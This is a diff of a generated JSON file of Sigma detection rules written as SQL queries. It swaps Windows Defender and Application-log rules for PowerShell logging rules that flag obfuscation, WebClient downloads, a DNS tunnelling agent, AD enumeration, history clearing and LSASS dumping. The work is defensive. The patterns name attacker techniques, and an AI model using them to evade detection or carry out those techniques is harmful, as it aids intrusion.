"falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('1040', '1042') AND Data LIKE '%://%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%rundll32.exe%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND Payload LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "win_msi_install_from_web.yml" + "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" }, { - "title": "Atera Agent Installation", - "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "title": "Suspicious Get Local Groups Information", + "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", "status": "test", - "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", - "author": "Bhabesh Raj", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "author": "frack113", "tags": [ - "attack.t1219" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate Atera agent installation" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' 
ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "win_software_atera_rmm_agent_install.yml" + "filename": "posh_pm_susp_local_group_reco.yml" }, { - "title": "Restricted Software Access By SRP", - "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell Module", + "id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "status": "experimental", - "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (ContextInfo LIKE '%-ModuleName %' ESCAPE '\\' OR ContextInfo LIKE '%-ModulePath %' ESCAPE '\\' OR ContextInfo LIKE '%-ScriptBlock %' ESCAPE '\\' OR ContextInfo LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "win_software_restriction_policies_block.yml" + "filename": "posh_pm_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Audit CVE Event", - "id": 
"48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", + "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", "status": "experimental", - "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", - "author": "Florian Roth (Nextron Systems), Zach Mathis", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068", "attack.defense_evasion", - "attack.t1211", - "attack.credential_access", - "attack.t1212", - "attack.lateral_movement", - "attack.t1210", - "attack.impact", - "attack.t1499.004" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "win_audit_cve.yml" + "filename": "posh_pm_invoke_obfuscation_var.yml" }, { - "title": "Potential Credential Dumping Via WER - Application", - "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", + "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", + "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", "status": "experimental", - "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate crashing of the lsass process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_werfault_susp_lsass_credential_dump.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Windows Defender Suspicious Configuration Changes", - "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", - "status": "stable", - "description": "Detects suspicious changes to the windows defender configuration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", + "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrator activity (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows 
Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" ], - "filename": "win_defender_suspicious_features_tampering.yml" + "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" }, { - "title": "Win Defender Restored Quarantine File", - "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", + "title": "Suspicious PowerShell Download - PoshModule", + "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", "status": "experimental", - "description": "Detects the restoration of files from the defender quarantine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrator activity restoring a file" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE 
'\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_defender_restored_quarantine_file.yml" + "filename": "posh_pm_susp_download.yml" }, { - "title": "Windows Defender Malware Detection History Deletion", - "id": "2afe6582-e149-11ea-87d0-0242ac130003", + "title": "Alternate PowerShell Hosts - PowerShell Module", + "id": "64e8e417-c19a-475a-8d19-98ea705394cc", "status": "test", - "description": "Windows Defender logs when the history of detected infections is deleted. Log file will contain the message \"Windows Defender Antivirus has removed history of malware and other potentially unwanted software\".", - "author": "Cian Heasley", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Deletion of Defender malware detections history for legitimate reasons" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1013')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= 
C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" ], - "filename": "win_defender_history_delete.yml" + "filename": "posh_pm_alternate_powershell_hosts.yml" }, { - "title": "Windows Defender Exploit Guard Tamper", - "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", - "status": "experimental", - "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Silence.EDA Detection", + "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "status": "test", + "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", + "author": "Alina Stepchenkova, Group-IB, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1572", + "attack.impact", + "attack.t1529", + "attack.g0091", + "attack.s0363" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE 
'\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" ], - "filename": "win_defender_exploit_guard_tamper.yml" + "filename": "posh_ps_apt_silence_eda.yml" }, { - "title": "LSASS Access Detected via Attack Surface Reduction", - "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", + "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", "status": "experimental", - "description": "Detects Access to LSASS Process", - "author": "Markus Neis", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Google Chrome GoogleUpdate.exe", - "Some Taskmgr.exe related activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows 
Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_defender_alert_lsass_access.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "Windows Defender Exclusions Added", - "id": "1321dc4e-a1fe-481d-a016-52c45f0c8b4f", - "status": "stable", - "description": "Detects the Setting of Windows 
Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "DirectorySearcher Powershell Exploitation", + "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "status": "test", + "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND NewValue LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" ], - "filename": "win_defender_exclusions.yml" + "filename": "posh_ps_directorysearcher.yml" }, { - "title": "PSExec and WMI Process Creations Block", - "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", - "status": "test", - "description": "Detects blocking of process creations originating from PSExec and WMI commands", - "author": "Bhabesh Raj", + "title": "Active Directory Computers Enumeration with Get-AdComputer", + "id": "36bed6b2-e9a0-4fff-beeb-413a92b86138", + "status": "experimental", + "description": "Detects usage of the \"Get-AdComputer\" to enumerate Computers within Active Directory.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1047", - "attack.t1569.002" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": 
[ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\')" ], - "filename": "win_defender_psexec_wmi_asr.yml" + "filename": "posh_ps_get_adcomputer.yml" }, { - "title": "Windows Defender AMSI Trigger Detected", - "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", - "status": "stable", - "description": "Detects triggering of AMSI by Windows Defender.", - "author": "Bhabesh Raj", + "title": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell", + "id": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "status": "experimental", + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Unlikely" + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% > %' ESCAPE '\\' OR ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE 
'\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" ], - "filename": "win_defender_amsi_trigger.yml" + "filename": "posh_ps_user_discovery_get_aduser.yml" }, { - "title": "Microsoft Defender Tamper Protection Trigger", - "id": "49e5bc24-8b86-49f1-b743-535f332c2856", - "status": "stable", - "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", - "author": "Bhabesh Raj, Nasreddine Bencherchali", + "title": "Clearing Windows Console History", + "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "status": "test", + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070", + "attack.t1070.003" ], "falsepositives": [ - "Administrator might try to disable defender features during testing (must be investigated)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) 
AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" ], - "filename": "win_defender_tamper_protection_trigger.yml" + "filename": "posh_ps_clearing_windows_console_history.yml" }, { - "title": "Windows Defender Threat Detection Disabled", - "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", - "status": "stable", - "description": "Detects disabling Windows Defender threat protection", - "author": "Ján Trenčanský, frack113", + "title": "Disable-WindowsOptionalFeature Command PowerShell", + "id": "99c4658d-2c5e-4d87-828d-7c066ca537c3", + "status": "experimental", + "description": "Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Administrator actions (should be investigated)", - "Seen being triggered occasionally during Windows 8 Defender Updates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Disable-WindowsOptionalFeature%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Online%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FeatureName%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows-Defender-Gui%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender-Features%' ESCAPE '\\' OR ScriptBlockText LIKE '%Windows-Defender%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Windows-Defender-ApplicationGuard%' ESCAPE '\\'))" ], - "filename": "win_defender_disabled.yml" + "filename": "posh_ps_disable_windows_optional_feature.yml" }, { - "title": "Windows Defender Threat Detected", - "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", - "status": "stable", - "description": "Detects all actions taken by Windows Defender malware detection engines", - "author": "Ján Trenčanský", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", + "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" ], - "filename": "win_defender_threat.yml" + "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Important Scheduled Task Deleted", - "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", + "title": "Suspicious PowerShell Download - Powershell Script", + 
"id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 